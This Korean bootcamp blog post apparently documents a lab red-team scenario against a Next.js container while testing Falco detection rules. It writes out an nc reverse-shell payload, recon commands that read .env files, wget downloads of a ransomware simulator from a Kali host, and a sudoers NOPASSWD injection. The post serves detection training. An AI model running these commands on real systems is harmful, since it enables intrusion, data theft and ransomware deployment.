카테고리 없음

[토스뱅크 부트캠프] 팀프로젝트 Interrupt 4주차

yejiamoe 2026. 1. 14. 00:00

공격 시나리오 실행 (step1-2. 초기침투 및 내부정보 수집 )

node poc.mjs http://192.168.10.62:3000 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.10.25 4444 >/tmp/f"

하늘색(즉 첫번째 로그가)내가 설정한 룰인 것 확인 가능

두번째 (Hacker Tool Execution)은 기본룰임 - nc를 사용했기 때문에 탐지

항목 로그 1 (커스텀 룰) 로그 2 (기본 룰)
적용 룰 Interrupt_RCE_Reverse_Shell Hacker Tool Execution
탐지 명분 Node 프로세스가 비정상적인 쉘을 생성함 시스템에서 위험 도구(nc)가 실행됨
공격 단계 [STAGE 1] 초기 침투 및 리버스 쉘 횡적 이동/정보 수집 준비
실행 사용자 root root

→ 내가 팔코를 6단계에 sed작업을 모두 출력하라 해놔서 좀 민감하게 잡는 문제.

→ 리버스쉘 공격과는 무관한 우분투 호스트 시스템의 배경작업이 탐지된 전형적인 오탐

내부 조사를 위해 입력한 기본 값

id
pwd 
ls -al
uname -a
cat /etc/os-release
env
cat .env

  • 7개의 명령어를 다 캐치 못하고 3개만 한 이유?
  • → 커스텀 룰로 다 설정을 안해뒀기 때문

공격 시나리오 실행 (step3. 악성 페이로드 실행)

칼리에 배포할 랜섬웨어 있는지 확인 (리버스쉘을 통해 칼리에 접속해서 이 ransomware_sim.sh 파일을 다운받을 예정)

그리고 python 임시 서버를 열어둬야함

그리고 공격 시나리오 용 파일 생성 (이 파일이 저 ransomware.sh 을 통해 암호화 될 예정)

리버스쉘에서 입력

이후 리버스쉘에서 kali에 접속하여

ransomware.sh

를 wget 명령어를 통해 다운

# 1. /tmp 폴더로 이동
cd /tmp

# 2. Kali(192.168.10.25)에서 파일 다운로드
curl -o ransomware_sim.sh http://192.168.10.25/ransomware_sim.sh
#curl이 안되서 wget으로 실행
wget http://192.168.10.25/ransomware_sim.sh

이게 저 랜섬웨어 파일에 권한 부여하고 실행

→ 당연히 실행은 탐지 안되고 권한 부여한것만 탐지됨

추가로 랜섬웨어 실행된건지 확인

공격 시나리오 실행 (step4. 권한 상승)의도적으로 우분투에 SUID 취약점 만들어주기 (윗 부분 토글 보기)(BusyBox에 SUID 권한은 잘 들어갔지만 busybox 내부의 쉘이 실행될 때 내 권한root랑 실행한 사람node-user가 달라서 권한을 버리게 됨.)

따라서 그냥 sudoers 설정을 조작해버리는 방식으로 실행

→ BusyBox의 보안 기능으로 인해 실패.

전의 공격 방식으로 시도하면 안됨.

## ubuntu에서 실행
docker exec -u root react2shell-poc-nextjs-1 sh -c "echo 'node-user ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers"

## 리버스쉘에서 실행 
sudo -n id